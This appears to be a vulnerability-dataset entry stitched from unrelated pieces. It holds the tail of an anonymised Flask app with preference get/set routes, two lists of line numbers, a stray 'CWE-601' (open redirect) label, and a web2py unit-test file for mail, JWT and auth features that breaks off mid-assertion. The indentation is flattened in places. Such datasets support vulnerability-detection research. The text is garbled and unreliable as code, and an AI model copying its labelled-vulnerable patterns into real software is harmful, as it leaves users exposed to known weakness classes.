{
'headers': [c[0] for c in VAR_30.description],
'rows': VAR_30.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@VAR_0.route("/api/preferences/get/<VAR_10>")
def FUNC_18(VAR_10):
if get_user() is None:
return "Authentication required", 401
if VAR_10 in VAR_31():
return Response(
json.dumps({'key': VAR_10, 'value': VAR_31()[VAR_10]}),
mimetype='application/json'
)
else:
return Response(
json.dumps({'key': VAR_10, 'error': 'novalue'}),
mimetype='application/json'
)
@VAR_0.route("/api/preferences/set/<VAR_10>/<VAR_11>")
def FUNC_19(VAR_10, VAR_11):
if get_user() is None:
return "Authentication required", 401
VAR_31()[VAR_10] = (None if VAR_11 == 'null' else VAR_11)
return Response(
json.dumps({'key': VAR_10, 'success': ''}),
mimetype='application/json'
), 201
if __name__ == '__main__':
VAR_0.run(port=5000, host="0.0.0.0")
| [
4,
9,
26,
28,
34,
36,
41,
44,
45,
54,
60,
73,
74,
78,
79,
83,
84,
88,
89,
105,
106,
127,
128,
138,
139,
152,
159,
160,
177,
180,
188,
189,
194,
200,
203,
204,
209,
211,
214,
224,
225,
232,
237,
245,
248,
249,
250,
251,
255,
267,
268,
287,
288,
299,
300,
317,
318,
333,
334,
349,
350,
365,
366,
374,
375,
393,
394,
399,
404,
405,
410,
413,
414,
417
] | [
4,
9,
26,
28,
34,
36,
41,
44,
45,
54,
60,
73,
74,
78,
79,
83,
84,
88,
89,
105,
106,
127,
128,
138,
139,
152,
159,
160,
177,
180,
188,
189,
194,
200,
203,
204,
209,
211,
214,
224,
225,
232,
237,
245,
248,
249,
250,
251,
255,
267,
268,
287,
288,
299,
300,
317,
318,
333,
334,
349,
350,
365,
366,
374,
375,
393,
394,
399,
410,
411,
416,
422,
423,
426
] |
4CWE-601
| #!/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for gluon.tools
"""
import os
import sys
import shutil
import tempfile
import smtplib
import datetime
import unittest
DEFAULT_URI = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import Table
from gluon import tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
IS_IMAP = "imap" in DEFAULT_URI
class TestMail(unittest.TestCase):
"""
Test the Mail class.
"""
class Message(object):
def __init__(self, sender, to, payload):
self.sender = sender
self.to = to
self.payload = payload
self._parsed_payload = None
@property
def parsed_payload(self):
if self._parsed_payload is None:
import email
self._parsed_payload = email.message_from_string(self.payload)
return self._parsed_payload
class DummySMTP(object):
"""
Dummy smtp server
NOTE: Test methods should take care of always leaving inbox and users empty when they finish.
"""
inbox = []
users = {}
def __init__(self, address, port, **kwargs):
self.address = address
self.port = port
self.has_quit = False
self.tls = False
def login(self, username, password):
if username not in self.users or self.users[username] != password:
raise smtplib.SMTPAuthenticationError
self.username = username
self.password = password
def sendmail(self, sender, to, payload):
self.inbox.append(TestMail.Message(sender, to, payload))
def quit(self):
self.has_quit = True
def ehlo(self, hostname=None):
pass
def starttls(self):
self.tls = True
def setUp(self):
self.original_SMTP = smtplib.SMTP
self.original_SMTP_SSL = smtplib.SMTP_SSL
smtplib.SMTP = TestMail.DummySMTP
smtplib.SMTP_SSL = TestMail.DummySMTP
def tearDown(self):
smtplib.SMTP = self.original_SMTP
smtplib.SMTP_SSL = self.original_SMTP_SSL
def test_hello_world(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
message = TestMail.DummySMTP.inbox.pop()
self.assertEqual(message.sender, mail.settings.sender)
self.assertEqual(message.to, ['somebody@example.com'])
header = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
self.assertTrue(header in message.payload)
self.assertTrue(message.payload.endswith('world'))
def test_failed_login(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.login = 'username:password'
self.assertFalse(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
def test_login(self):
TestMail.DummySMTP.users['username'] = 'password'
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.login = 'username:password'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
del TestMail.DummySMTP.users['username']
TestMail.DummySMTP.inbox.pop()
def test_html(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='<html><head></head><body></body></html>'))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: text/html' in message.payload)
def test_alternative(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
message=('Text only', '<html><pre>HTML Only</pre></html>')))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue(message.parsed_payload.is_multipart())
self.assertTrue(message.parsed_payload.get_content_type() == 'multipart/alternative')
parts = message.parsed_payload.get_payload()
self.assertTrue('Text only' in parts[0].as_string())
self.assertTrue('<html><pre>HTML Only</pre></html>' in parts[1].as_string())
def test_ssl(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.ssl = True
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
TestMail.DummySMTP.inbox.pop()
def test_tls(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.tls = True
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
TestMail.DummySMTP.inbox.pop()
def test_attachment(self):
module_file = os.path.abspath(__file__)
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
message='world',
attachments=Mail.Attachment(module_file)))
message = TestMail.DummySMTP.inbox.pop()
attachment = message.parsed_payload.get_payload(1).get_payload(decode=True)
with open(module_file, 'rb') as mf:
self.assertEqual(to_bytes(attachment), to_bytes(mf.read()))
# Test missing attachment name error
stream = open(module_file)
self.assertRaises(Exception, lambda *args, **kwargs: Mail.Attachment(*args, **kwargs), stream)
stream.close()
# Test you can define content-id and content type
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
message='world',
attachments=Mail.Attachment(module_file, content_id='trololo', content_type='tra/lala')))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: tra/lala' in message.payload)
self.assertTrue('Content-Id: <trololo>' in message.payload)
# TODO: class TestAuthJWT(unittest.TestCase):
class TestAuthJWT(unittest.TestCase):
    """Tests for gluon.tools.AuthJWT (JSON Web Token support on top of Auth)."""
    def setUp(self):
        # Build a minimal request/current environment, a fresh Auth with a
        # single user, and an AuthJWT manager with a known secret key.
        from gluon.tools import AuthJWT
        from gluon import current
        self.request = Request(env={})
        self.request.application = 'a'
        self.request.controller = 'c'
        self.request.function = 'f'
        self.request.folder = 'applications/admin'
        self.current = current
        self.current.request = self.request
        self.db = DAL(DEFAULT_URI, check_reserved=['all'])
        self.auth = Auth(self.db)
        self.auth.define_tables(username=True, signature=False)
        self.user_data = dict(username='jwtuser', password='jwtuser123')
        # Hash the password through the field's validator chain so that a
        # later credential check against the stored value can succeed.
        self.db.auth_user.insert(username=self.user_data['username'],
                                 password=str(
                                     self.db.auth_user.password.requires[0](
                                         self.user_data['password'])[0]))
        self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
    def test_jwt_token_manager(self):
        """A token is issued from credentials and can then be refreshed."""
        import gluon.serializers
        # First call: username/password in request vars -> a new token.
        self.request.vars.update(self.user_data)
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
        del self.request.vars['username']
        del self.request.vars['password']
        # Second call: only the previously issued token is supplied.
        self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
    def test_allows_jwt(self):
        """A function decorated with allows_jwt() sees the token's user."""
        import gluon.serializers
        self.request.vars.update(self.user_data)
        self.token = self.jwtauth.jwt_token_manager()
        self.assertIsNotNone(self.token)
        del self.request.vars['username']
        del self.request.vars['password']
        self.token = self.jwtauth.jwt_token_manager()
        self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
        @self.jwtauth.allows_jwt()
        def optional_auth():
            # Inside the decorated function auth.user is populated from the JWT.
            self.assertEqual(self.user_data['username'], self.auth.user.username)
        optional_auth()
@unittest.skipIf(IS_IMAP, "TODO: Imap raises 'Connection refused'")
# class TestAuth(unittest.TestCase):
#
# def setUp(self):
# request = Request(env={})
# request.application = 'a'
# request.controller = 'c'
# request.function = 'f'
# request.folder = 'applications/admin'
# response = Response()
# session = Session()
# T = TranslatorFactory('', 'en')
# session.connect(request, response)
# from gluon.globals import current
# current.request = request
# current.response = response
# current.session = session
# current.T = T
# self.db = DAL(DEFAULT_URI, check_reserved=['all'])
# self.auth = Auth(self.db)
# self.auth.define_tables(username=True, signature=False)
# self.db.define_table('t0', Field('tt'), self.auth.signature)
# self.auth.enable_record_versioning(self.db)
# # Create a user
# self.auth.get_or_create_user(dict(first_name='Bart',
# last_name='Simpson',
# username='bart',
# email='bart@simpson.com',
# password='bart_password',
# registration_key='bart',
# registration_id=''
# ))
# # self.auth.settings.registration_requires_verification = False
# # self.auth.settings.registration_requires_approval = False
#
# def test_assert_setup(self):
# self.assertEqual(self.db(self.db.auth_user.username == 'bart').select().first()['username'], 'bart')
# self.assertTrue('auth_user' in self.db)
# self.assertTrue('auth_group' in self.db)
# self.assertTrue('auth_membership' in self.db)
# self.assertTrue('auth_permission' in self.db)
# self.assertTrue('auth_event' in self.db)
#
# def test_enable_record_versioning(self):
# self.assertTrue('t0_archive' in self.db)
#
# def test_basic_blank_forms(self):
# for f in ['login', 'retrieve_password',
# 'retrieve_username',
# # 'register' # register complain about : client_side=self.settings.client_side
# ]:
# html_form = getattr(self.auth, f)().xml()
# self.assertTrue('name="_formkey"' in html_form)
#
# # NOTE: Not sure it is the proper way to logout_bare() as there is not methods for that and auth.logout() failed
# self.auth.logout_bare()
# # self.assertTrue(self.auth.is_logged_in())
#
# for f in ['logout', 'verify_email', 'reset_password',
# 'change_password', 'profile', 'groups']:
# self.assertRaisesRegexp(HTTP, "303*", getattr(self.auth, f))
#
# self.assertRaisesRegexp(HTTP, "401*", self.auth.impersonate)
#
# try:
# for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
# 'auth_membership', 'auth_permission', 'auth_group',
# 'auth_user']:
# self.db[t].drop()
# except SyntaxError as e:
# # GAE doesn't support drop
# pass
# return
#
# def test_get_or_create_user(self):
# self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
# self.db.commit()
# # True case
# self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
# 'username': 'user1',
# 'password': 'password_123'
# })['username'], 'user1')
# # user2 doesn't exist yet and get created
# self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
# 'username': 'user2'})['username'], 'user2')
# # user3 for corner case
# self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
# 'last_name': 'Simpson',
# 'email': 'user3@test.com',
# 'registration_id': 'user3',
# 'username': 'user3'})['username'], 'user3')
# # False case
# self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_login_bare(self):
# # The following test case should succeed but failed as I never received the user record but False
# self.auth.login_bare(username='bart@simpson.com', password='bart_password')
# self.assertTrue(self.auth.is_logged_in())
# # Failing login because bad_password
# self.assertEqual(self.auth.login_bare(username='bart', password='wrong_password'), False)
# self.db.auth_user.truncate()
#
# def test_register_bare(self):
# # corner case empty register call register_bare without args
# self.assertRaises(ValueError, self.auth.register_bare)
# # failing register_bare user already exist
# self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
# # successful register_bare
# self.assertEqual(self.auth.register_bare(username='user2',
# email='user2@test.com',
# password='password_123')['username'], 'user2')
# # raise ValueError
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(wrong_field_name='user3', password='password_123'))
# # raise ValueError wrong email
# self.assertRaises(ValueError, self.auth.register_bare,
# **dict(email='user4@', password='password_123'))
# self.db.auth_user.truncate()
# self.db.commit()
#
# def test_bulk_register(self):
# self.auth.login_bare(username='bart', password='bart_password')
# self.auth.settings.bulk_register_enabled = True
# bulk_register_form = self.auth.bulk_register(max_emails=10).xml()
# self.assertTrue('name="_formkey"' in bulk_register_form)
#
# def test_change_password(self):
# self.auth.login_bare(username='bart', password='bart_password')
# change_password_form = getattr(self.auth, 'change_password')().xml()
# self.assertTrue('name="_formkey"' in change_password_form)
#
# def test_profile(self):
# self.auth.login_bare(username='bart', password='bart_password')
# profile_form = getattr(self.auth, 'profile')().xml()
# self.assertTrue('name="_formkey"' in profile_form)
#
# # def test_impersonate(self):
# # # Create a user to be impersonated
# # self.auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # self.auth.add_group('impersonate')
# # self.auth.add_membership(user_id=1,
# # group_id=self.db(self.db.auth_user.username == 'bart'
# # ).select(self.db.auth_user.id).first().id)
# # self.auth.add_permission(group_id=self.db(self.db.auth_group.role == 'impersonate'
# # ).select(self.db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # self.auth.login_bare(username='bart', password='bart_password')
# # self.assertTrue(self.auth.is_logged_in())
# # # Bart impersonate Omer
# # omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
# # impersonate_form = self.auth.impersonate(user_id=omer_id)
# # self.assertTrue(self.auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
#
# # def test_impersonate(self):
# # request = Request(env={})
# # request.application = 'a'
# # request.controller = 'c'
# # request.function = 'f'
# # request.folder = 'applications/admin'
# # response = Response()
# # session = Session()
# # T = TranslatorFactory('', 'en')
# # session.connect(request, response)
# # from gluon.globals import current
# # current.request = request
# # current.response = response
# # current.session = session
# # current.T = T
# # db = DAL(DEFAULT_URI, check_reserved=['all'])
# # auth = Auth(db)
# # auth.define_tables(username=True, signature=False)
# # db.define_table('t0', Field('tt'), auth.signature)
# # auth.enable_record_versioning(db)
# # # Create a user
# # auth.get_or_create_user(dict(first_name='Bart',
# # last_name='Simpson',
# # username='bart',
# # email='bart@simpson.com',
# # password='bart_password',
# # registration_key='bart',
# # registration_id=''
# # ))
# # # Create a user to be impersonated
# # auth.get_or_create_user(dict(first_name='Omer',
# # last_name='Simpson',
# # username='omer',
# # email='omer@test.com',
# # password='password_omer',
# # registration_key='',
# # registration_id=''))
# # # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
# # auth.add_group('impersonate')
# # auth.add_membership(user_id=1,
# # group_id=db(db.auth_user.username == 'bart'
# # ).select(db.auth_user.id).first().id)
# # auth.add_permission(group_id=db(db.auth_group.role == 'impersonate'
# # ).select(db.auth_group.id).first().id,
# # name='impersonate',
# # table_name='auth_user',
# # record_id=0)
# # # Bart login
# # auth.login_bare(username='bart', password='bart_password')
# # # Bart impersonate Omer
# # omer_id = db(db.auth_user.username == 'omer').select(db.auth_user.id).first().id
# # impersonate_form = auth.impersonate(user_id=omer_id)
# # self.assertTrue(auth.is_impersonating())
# # self.assertEqual(impersonate_form, 'test')
class TestAuth(unittest.TestCase):
def myassertRaisesRegex(self, *args, **kwargs):
    """Dispatch to assertRaisesRegex (Py3) or assertRaisesRegexp (Py2)."""
    method_name = 'assertRaisesRegexp' if PY2 else 'assertRaisesRegex'
    return getattr(self, method_name)(*args, **kwargs)
def setUp(self):
    """Build a request/response/session environment, a fresh Auth, and user bart."""
    self.request = Request(env={})
    self.request.application = 'a'
    self.request.controller = 'c'
    self.request.function = 'f'
    self.request.folder = 'applications/admin'
    self.response = Response()
    self.session = Session()
    T = TranslatorFactory('', 'en')
    self.session.connect(self.request, self.response)
    # Wire everything into the thread-local `current` so Auth can find it.
    from gluon.globals import current
    self.current = current
    self.current.request = self.request
    self.current.response = self.response
    self.current.session = self.session
    self.current.T = T
    self.db = DAL(DEFAULT_URI, check_reserved=['all'])
    self.auth = Auth(self.db)
    self.auth.define_tables(username=True, signature=False)
    self.db.define_table('t0', Field('tt'), self.auth.signature)
    self.auth.enable_record_versioning(self.db)
    # Disable verification/approval so register_bare() yields a user with an
    # empty registration_key that can log in immediately.
    self.auth.settings.registration_requires_verification = False
    self.auth.settings.registration_requires_approval = False
    # Create a user
    # Note: get_or_create_user() doesn't seems to create user properly it better to use register_bare() and
    # prevent login_bare() test from succeed. db insert the user manually not properly work either.
    # Not working
    # self.auth.get_or_create_user(dict(first_name='Bart',
    #                                   last_name='Simpson',
    #                                   username='bart',
    #                                   email='bart@simpson.com',
    #                                   password='bart_password',
    #                                   # registration_key=None,
    #                                   #registration_id='bart@simpson.com'
    #                                   ),
    #                              login=False)
    # Not working
    # self.db.auth_user.insert(first_name='Bart',
    #                          last_name='Simpson',
    #                          username='bart',
    #                          email='bart@simpson.com',
    #                          password='bart_password')
    # self.db.commit()
    self.auth.register_bare(first_name='Bart',
                            last_name='Simpson',
                            username='bart',
                            email='bart@simpson.com',
                            password='bart_password')
def test_assert_setup(self):
    """Verify the auth tables, bart's row, and his auto-created personal group."""
    for table in ('auth_user', 'auth_group', 'auth_membership',
                  'auth_permission', 'auth_event'):
        self.assertIn(table, self.db)
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.assertEqual(bart['username'], 'bart')
    # Empty registration_key: verification/approval were disabled in setUp().
    self.assertEqual(bart['registration_key'], '')
    # register_bare() should also have created a 'user_<id>' group and a
    # membership row linking bart to it.
    personal_group = self.db(self.db.auth_group.role == 'user_{0}'.format(bart.id)).select().first()
    membership = self.db((self.db.auth_membership.group_id == personal_group.id) &
                         (self.db.auth_membership.user_id == bart.id)).select().first()
    self.assertTrue(membership)
# Just calling many form functions
def test_basic_blank_forms(self):
    """Render each auth form unauthenticated and check its behaviour.

    Forms available to anonymous visitors must contain the CSRF _formkey
    field; member-only forms must redirect (HTTP 303); impersonate without
    credentials must return HTTP 401.
    """
    for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
        html_form = getattr(self.auth, f)().xml()
        self.assertTrue(b'name="_formkey"' in html_form)
    for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
        self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
    self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
    # Drop the tables so the schema can be re-created cleanly.
    try:
        for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
                  'auth_membership', 'auth_permission', 'auth_group',
                  'auth_user']:
            self.db[t].drop()
    except SyntaxError:
        # GAE's adapter doesn't support drop; best-effort cleanup only.
        # (was `except SyntaxError as e` with `e` unused; also removed the
        # redundant trailing bare `return`)
        pass
def test_get_vars_next(self):
    """get_vars_next() echoes back the request's _next variable."""
    expected = 'next_test'
    self.current.request.vars._next = expected
    self.assertEqual(self.auth.get_vars_next(), expected)
# TODO: def test_navbar(self):
# TODO: def test___get_migrate(self):
def test_enable_record_versioning(self):
    """enable_record_versioning() in setUp() must have created t0_archive."""
    self.assertIn('t0_archive', self.db)
# TODO: def test_define_signature(self):
# TODO: def test_define_signature(self):
# TODO: def test_define_table(self):
def test_log_event(self):
    """log_event() records description/vars/origin with the current user id."""
    self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first())  # bypass login_bare()
    bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
    # user logged in
    self.auth.log_event(description='some_log_event_description_%(var1)s',
                        vars={"var1": "var1"},
                        origin='log_event_test_1')
    # Read the event row back, skipping the non-deterministic id/time_stamp.
    rtn = self.db(self.db.auth_event.origin == 'log_event_test_1'
                  ).select(*[self.db.auth_event[f]
                             for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
    self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_1',
                                            'client_ip': None,
                                            'user_id': bart_id,
                                            'description': 'some_log_event_description_var1'}.items()))
    # user not logged
    # Logged-out events are still recorded, with user_id None.
    self.auth.logout_bare()
    self.auth.log_event(description='some_log_event_description_%(var2)s',
                        vars={"var2": "var2"},
                        origin='log_event_test_2')
    rtn = self.db(self.db.auth_event.origin == 'log_event_test_2'
                  ).select(*[self.db.auth_event[f]
                             for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
    self.assertEqual(set(rtn.items()), set({'origin': 'log_event_test_2',
                                            'client_ip': None,
                                            'user_id': None,
                                            'description': 'some_log_event_description_var2'}.items()))
    # no logging tests
    # With logging_enabled=False, log_event() must be a no-op.
    self.auth.settings.logging_enabled = False
    count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
    self.auth.log_event(description='some_log_event_description_%(var3)s',
                        vars={"var3": "var3"},
                        origin='log_event_test_3')
    count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
    self.assertEqual(count_log_event_test_after, count_log_event_test_before)
    # A None description is also a no-op even with logging re-enabled.
    self.auth.settings.logging_enabled = True
    count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
    self.auth.log_event(description=None,
                        vars={"var4": "var4"},
                        origin='log_event_test_4')
    count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
    self.assertEqual(count_log_event_test_after, count_log_event_test_before)
    # TODO: Corner case translated description...
def test_get_or_create_user(self):
    """get_or_create_user() returns the existing row or creates a new one."""
    self.db.auth_user.insert(email='user1@test.com', username='user1', password='password_123')
    self.db.commit()
    # An already-existing user is simply returned.
    existing = self.auth.get_or_create_user({'email': 'user1@test.com',
                                             'username': 'user1',
                                             'password': 'password_123'})
    self.assertEqual(existing['username'], 'user1')
    # user2 doesn't exist yet, so it gets created.
    created = self.auth.get_or_create_user({'email': 'user2@test.com',
                                            'username': 'user2'})
    self.assertEqual(created['username'], 'user2')
    # Corner case: registration_id supplied alongside the username.
    corner = self.auth.get_or_create_user({'first_name': 'Omer',
                                           'last_name': 'Simpson',
                                           'email': 'user3@test.com',
                                           'registration_id': 'user3',
                                           'username': 'user3'})
    self.assertEqual(corner['username'], 'user3')
    # Failure case: an empty email yields no user at all.
    self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
    self.db.auth_user.truncate()
    self.db.commit()
# TODO: def test_basic(self):
# TODO: def test_login_user(self):
# TODO: def test__get_login_settings(self):
def test_login_bare(self):
    """login_bare() succeeds with correct credentials and fails otherwise."""
    self.auth.login_bare(username='bart', password='bart_password')
    self.assertTrue(self.auth.is_logged_in())
    self.auth.logout_bare()
    # Failing login because wrong_password
    self.assertFalse(self.auth.login_bare(username='bart', password='wrong_password'))
    # NOTE : The following failed for some reason, but I can't find out why
    # self.auth = Auth(self.db)
    # self.auth.define_tables(username=False, signature=False)
    # self.auth.settings.registration_requires_verification = False
    # self.auth.settings.registration_requires_approval = False
    # self.auth.register_bare(first_name='Omer',
    #                         last_name='Simpson',
    #                         # no username field passed, failed with :
    #                         # ValueError('register_bare: userfield not provided or invalid')
    #                         # Or
    #                         # username='omer',
    #                         # Or
    #                         # username='omer@simpson.com',
    #                         # In either previous cases, it failed with :
    #                         # self.assertTrue(self.auth.is_logged_in()) AssertionError: False is not true
    #                         email='omer@simpson.com',
    #                         password='omer_password')
    # self.auth.login_bare(username='omer@sympson.com', password='omer_password')
    # self.assertTrue(self.auth.is_logged_in())
def test_register_bare(self):
    """Exercise register_bare() success, duplicate and invalid-input paths."""
    # Calling with no arguments at all is a ValueError.
    self.assertRaises(ValueError, self.auth.register_bare)
    # Registering an existing username returns False (no exception).
    self.assertEqual(self.auth.register_bare(username='bart', password='wrong_password'), False)
    # A brand new user registers fine.
    created = self.auth.register_bare(username='user2',
                                      email='user2@test.com',
                                      password='password_123')
    self.assertEqual(created['username'], 'user2')
    # Unknown field name -> ValueError.
    self.assertRaises(ValueError, self.auth.register_bare,
                      wrong_field_name='user3', password='password_123')
    # Malformed email -> ValueError.
    self.assertRaises(ValueError, self.auth.register_bare,
                      email='user4@', password='password_123')
    self.db.auth_user.truncate()
    self.db.commit()
# TODO: def test_cas_login(self):
# TODO: def test_cas_validate(self):
# TODO: def test__reset_two_factor_auth(self):
# TODO: def test_when_is_logged_in_bypass_next_in_url(self):
# TODO: def test_login(self):
# TODO: def test_logout(self):
def test_logout_bare(self):
    """logout_bare() drops the logged-in state set by login_user()."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    self.assertTrue(self.auth.is_logged_in())
    self.auth.logout_bare()
    self.assertFalse(self.auth.is_logged_in())
# TODO: def test_register(self):
def test_is_logged_in(self):
    """is_logged_in() is truthy iff auth.user is set; the value is opaque."""
    for marker, expected in (('logged_in', True), (None, False)):
        self.auth.user = marker
        self.assertEqual(bool(self.auth.is_logged_in()), expected)
# TODO: def test_verify_email(self):
# TODO: def test_retrieve_username(self):
def test_random_password(self):
    """Smoke test: random_password() is callable and returns a truthy value."""
    generated = self.auth.random_password()
    self.assertTrue(generated)
# TODO: def test_reset_password_deprecated(self):
# TODO: def test_confirm_registration(self):
# TODO: def test_email_registration(self):
def test_bulk_register(self):
    """A logged-in user with bulk_register enabled gets a CSRF-protected form."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    self.auth.settings.bulk_register_enabled = True
    rendered = self.auth.bulk_register(max_emails=10).xml()
    self.assertIn(b'name="_formkey"', rendered)
# TODO: def test_manage_tokens(self):
# TODO: def test_reset_password(self):
# TODO: def test_request_reset_password(self):
# TODO: def test_email_reset_password(self):
# TODO: def test_retrieve_password(self):
def test_change_password(self):
    """The change-password form renders with the CSRF _formkey for a user."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    rendered = self.auth.change_password().xml()
    self.assertIn(b'name="_formkey"', rendered)
def test_profile(self):
    """The profile form renders with the CSRF _formkey for a logged-in user."""
    bart = self.db(self.db.auth_user.username == 'bart').select().first()
    self.auth.login_user(bart)  # bypass login_bare()
    rendered = self.auth.profile().xml()
    self.assertIn(b'name="_formkey"', rendered)
# TODO: def test_run_login_onaccept(self):
# TODO: def test_jwt(self):
# TODO: def test_is_impersonating(self):
def test_impersonate(self):
    """impersonate(): permission checks, form rendering, and corner cases."""
    # Create a user to be impersonated
    self.auth.get_or_create_user(dict(first_name='Omer',
                                      last_name='Simpson',
                                      username='omer',
                                      email='omer@test.com',
                                      password='password_omer',
                                      registration_key='',
                                      registration_id=''),
                                 login=False)
    self.db.commit()
    self.assertFalse(self.auth.is_logged_in())
    # Create impersonate group, assign bart to impersonate group and add impersonate permission over auth_user
    group_id = self.auth.add_group('impersonate')
    self.auth.add_membership(user_id=self.db(self.db.auth_user.username == 'bart'
                                             ).select(self.db.auth_user.id).first().id,
                             group_id=group_id)
    self.auth.add_permission(group_id=group_id,
                             name='impersonate',
                             table_name='auth_user',
                             record_id=0)
    # Bart login
    # self.auth.login_bare(username='bart', password='bart_password')
    self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first())  # bypass login_bare()
    self.assertTrue(self.auth.is_logged_in())
    bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
    self.assertEqual(self.auth.user_id, bart_id)
    # self.session.auth = self.auth
    # self.assertTrue(self.session.auth)
    # basic impersonate() test that return a read form
    self.assertEqual(self.auth.impersonate().xml(),
                     b'<form action="#" enctype="multipart/form-data" method="post"><table><tr id="no_table_user_id__row"><td class="w2p_fl"><label class="" for="no_table_user_id" id="no_table_user_id__label">User Id: </label></td><td class="w2p_fw"><input class="integer" id="no_table_user_id" name="user_id" type="text" value="" /></td><td class="w2p_fc"></td></tr><tr id="submit_record__row"><td class="w2p_fl"></td><td class="w2p_fw"><input type="submit" value="Submit" /></td><td class="w2p_fc"></td></tr></table></form>')
    # bart impersonate itself
    self.assertEqual(self.auth.impersonate(bart_id), None)
    self.assertFalse(self.auth.is_impersonating())  # User shouldn't impersonate itself?
    # Bart impersonate Omer
    omer_id = self.db(self.db.auth_user.username == 'omer').select(self.db.auth_user.id).first().id
    impersonate_form = self.auth.impersonate(user_id=omer_id)
    self.assertTrue(self.auth.is_impersonating())
    self.assertEqual(self.auth.user_id, omer_id)  # we make it really sure
    self.assertEqual(impersonate_form.xml(),
